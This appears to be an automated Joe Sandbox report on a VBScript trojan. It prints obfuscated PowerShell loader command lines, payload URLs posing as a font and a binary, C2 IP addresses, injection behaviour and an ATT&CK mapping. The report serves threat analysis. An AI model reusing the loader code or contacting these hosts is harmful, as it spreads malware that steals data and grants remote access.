'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-brJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong 
(krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-brJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match; File source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

Source: Yara match; File source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\dialer.exe Code function: 9_2_05949A57 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError, 9_2_05949A57
MITRE ATT&CK Matrix (techniques listed per tactic column; the numbers in parentheses are the report's count badges shown next to the techniques it observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting (2 2 1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (1 1); Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task; Systemd Timers
Persistence: BITS Jobs (1); Scripting (2 2 1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (1 1 1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (4 1); BITS Jobs (1); Process Injection (1 1 1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: Input Capture (2 1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (1 2 1); Process Discovery (1); Virtualization/Sandbox Evasion (4 1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (1 2 3); Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture (2 1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1 1); Non-Standard Port (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (1 3); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1578227; Sample: F8HYX5HOgA.vbs; Startdate: 19/12/2024; Architecture: WINDOWS; Score: 100

Domains/IPs contacted: www.royalengineeringllc.com; www.astenterprises.com.pk; 2 other IPs or domains
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 6 other signatures

Process tree (as drawn in the behavior graph):
wscript.exe (1)
  signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
  powershell.exe (24)
    signatures: Suspicious powershell command line found; Powershell uses Background Intelligent Transfer Service (BITS); Found suspicious powershell code related to unpacking or dynamic code loading
    powershell.exe (23)
      signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
      wab.exe (1 6)
        network: royalengineeringllc.com 103.120.177.150, 443, 49771 NETMAGIC-APNetmagicDatacenterMumbaiIN India
        dialer.exe
          network: 91.92.252.226, 49815, 49836, 49862 THEZONEBG Bulgaria
          signatures: Switches to a custom stack to bypass stack traces
    conhost.exe
svchost.exe (1 1)
  network: astenterprises.com.pk 107.161.23.150, 443, 49707, 49708 RAMNODEUS United States; 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
F8HYX5HOgA.vbs | 46% | Virustotal | | Browse
F8HYX5HOgA.vbs | 42% | ReversingLabs | Script-WScript.Trojan.Malgent |
F8HYX5HOgA.vbs | 100% | Avira | VBS/kab.Talu.ace5b8 |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.microsoft.co/ | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk:443/ms/Spej.ttf | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ice | 0% | Avira URL Cloud | safe |
https://www.royalengineeringllc.com/ms/ms.bin0t | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/Spej.ttf | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/Spej.ttfP | 0% | Avira URL Cloud | safe |
https://www.royalengineeringllc.com/ms/ms.binGu | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/Spej.ttfXR | 0% | Avira URL Cloud | safe |
https://www.royalengineeringllc.com/ms/ms.bin | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
astenterprises.com.pk | 107.161.23.150 | true | false | | high
royalengineeringllc.com | 103.120.177.150 | true | false | | unknown
www.astenterprises.com.pk | unknown | unknown | false | | high
www.royalengineeringllc.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.royalengineeringllc.com/ms/ms.bin | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/Spej.ttf | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.2709173693.000002315FF93000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/Spej.ttfP | powershell.exe, 00000001.00000002.2709173693.000002315EFBA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000004.00000002.3339991717.000002A7978A4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ice | svchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ | svchost.exe, 00000004.00000002.3341467361.000002A79CEED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341611453.000002A79CF0A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod/C: | svchost.exe, 00000004.00000003.2090170168.000002A79CD93000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000005.00000002.2550855628.0000000007F10000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/Spej.ttfXR | powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co/ | powershell.exe, 00000005.00000002.2544913073.00000000070F3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe |
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore6lBjqpowershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.astenterprises.com.pk:443/ms/Spej.ttfsvchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.royalengineeringllc.com/ms/ms.bin0twab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.royalengineeringllc.com/ms/ms.binGuwab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false |
| 91.92.252.226 | unknown | Bulgaria | 34368 | THEZONEBG | false |
| 103.120.177.150 | royalengineeringllc.com | India | 17439 | NETMAGIC-APNetmagicDatacenterMumbaiIN | false |

| IP |
| --- |
| 127.0.0.1 |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578227
Start date and time: 2024-12-19 12:46:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: F8HYX5HOgA.vbs (renamed because the original name is a hash value)
Original Sample Name: ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@11/11@3/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 60%
• Number of executed functions: 65
• Number of non-executed functions: 31
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4856 because it is empty
• Execution Graph export aborted for target wab.exe, PID 2780 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
